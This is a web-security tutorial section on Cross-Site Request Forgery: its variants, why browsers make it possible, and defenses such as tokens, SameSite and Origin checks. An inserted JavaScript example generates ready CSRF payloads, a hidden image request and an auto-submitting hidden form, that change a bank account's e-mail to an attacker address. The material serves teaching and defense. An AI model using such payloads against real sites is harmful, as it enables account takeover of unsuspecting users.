4.3. CSRF

4.3.1. Introduction

Cross-Site Request Forgery (CSRF), also known as One-Click Attack or Session Riding, is an attack that abuses the trust a website places in a logged-in user's browser. Although the name sounds like XSS, the two are very different: XSS exploits the user's trust in a site (malicious script runs inside the site's own origin), whereas CSRF exploits the site's trust in its users by forging requests that appear to come from an authenticated user.

4.3.2. Classification

4.3.2.1. Resource Inclusion

Resource inclusion is the type you will see in most presentations or foundation courses that introduce the CSRF concept. It boils down to the attacker controlling a resource referenced by an HTML tag (e.g. <img>, <audio>, <video>, <object>, <script>, etc.). Any tag that loads a remote resource can complete the attack if the attacker can influence the URL that gets loaded.

Because the browser attaches cookies to a request based on the destination site alone, without regard to which page initiated the request (cookies carry no origin check), this attack needs no XSS: any attacker-controlled site, or an injection point on the target site itself, can perform it. This type is limited to GET requests, since those are the only requests a browser makes when loading a resource URL. Its main limitation is therefore that it requires the target to misuse the safe HTTP methods, i.e. to perform state-changing actions in response to GET.

4.3.2.2. Form-based

Seen when the target uses HTTP methods correctly and only accepts state changes via POST. The attacker builds a form that submits the request they want made on the victim's behalf, together with a JavaScript snippet that forces the victim's browser to submit it automatically.

The form can consist entirely of hidden elements, so the victim has little chance of noticing it.

If cookies are not scoped properly, the attacker can host the form on any site, and the attack succeeds as long as the victim is logged in to the target and holds a valid session cookie. If the forged request is chosen well, a successful attack simply lands the victim on one of the target's normal pages, so nothing looks amiss. This method is particularly effective in phishing campaigns, where the attacker can direct victims to the page that hosts the form.
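The two payload classes described above (resource inclusion for GET-based targets, an auto-submitting hidden form for POST-based ones), as an added example that is not part of the original page. The target URL, field names and values are hypothetical; the attacker-controlled values are HTML-escaped so that a quote or angle bracket in a value cannot break the generated markup.

```javascript
// Added example (not from the original page): generating the two CSRF payload
// classes described above. The endpoint and fields are hypothetical.

// Escape attacker-chosen values so a quote or '<' in a value cannot break the
// generated HTML; the payload must parse cleanly in the victim's browser.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Resource-inclusion CSRF: any tag that loads a remote resource makes the
// browser issue a GET with the victim's cookies attached. Only useful when the
// target performs a state change on GET.
function resourceInclusionPayload(targetUrl, params) {
  const url = `${targetUrl}?${new URLSearchParams(params).toString()}`;
  // Zero-size image: the broken-image icon is never visible to the victim.
  return `<img src="${escapeHtml(url)}" width="0" height="0" alt="">`;
}

// Form-based CSRF: a form made entirely of hidden inputs, submitted by script
// as soon as the page loads, delivers a POST carrying the victim's cookies.
// This is what an attacker uses when the target correctly restricts state
// changes to POST.
function formPayload(targetAction, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join("\n    ");
  return `<form id="f" method="POST" action="${escapeHtml(targetAction)}">
    ${inputs}
  </form>
  <script>document.getElementById("f").submit();</script>`;
}

// Constructed sample: a hypothetical endpoint that changes the account e-mail.
const TARGET = "https://bank.example/account/email";
const FIELDS = { email: "attacker@evil.example", confirm: "1" };

function demo() {
  return {
    get: resourceInclusionPayload(TARGET, FIELDS),
    post: formPayload(TARGET, FIELDS),
  };
}

const payloads = demo();
console.log(payloads.get);
console.log(payloads.post);
```

Either payload is simply embedded in a page the attacker controls; the browser does the rest, because it attaches the target's cookies to the request without asking which page triggered it.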

4.3.2.3. XMLHttpRequest

XMLHttpRequest (XHR) is probably the least often seen variant, yet because so many modern web applications rely on XHR, a great deal of effort goes into building countermeasures for this particular case.

Because of the Same-Origin Policy (SOP), XHR-based CSRF usually arrives as an XSS payload. Without a permissive Cross-Origin Resource Sharing (CORS) policy on the target, an attacker hosting the payload on their own site is effectively limited to same-origin requests: the response to a cross-origin XHR cannot be read, and a request carrying custom headers or a non-form Content-Type is stopped at the CORS preflight.

The attack payload for this type of CSRF is essentially a standard XHR; the attacker has simply found some way to inject it into the DOM of a page in the victim's browser.

4.3.3. Defense

  • Confirm that the request was deliberately submitted by the user, via an anti-CSRF token tied to the session or a verification code (CAPTCHA)

  • Verify the Referer (or Origin) header and the Content-Type of the request

  • Perform state-changing operations such as modifying or deleting user data only via POST, never via GET

  • Avoid site-wide cookies: set the cookie Domain attribute as narrowly as possible (and set the SameSite attribute, so cross-site requests omit the session cookie)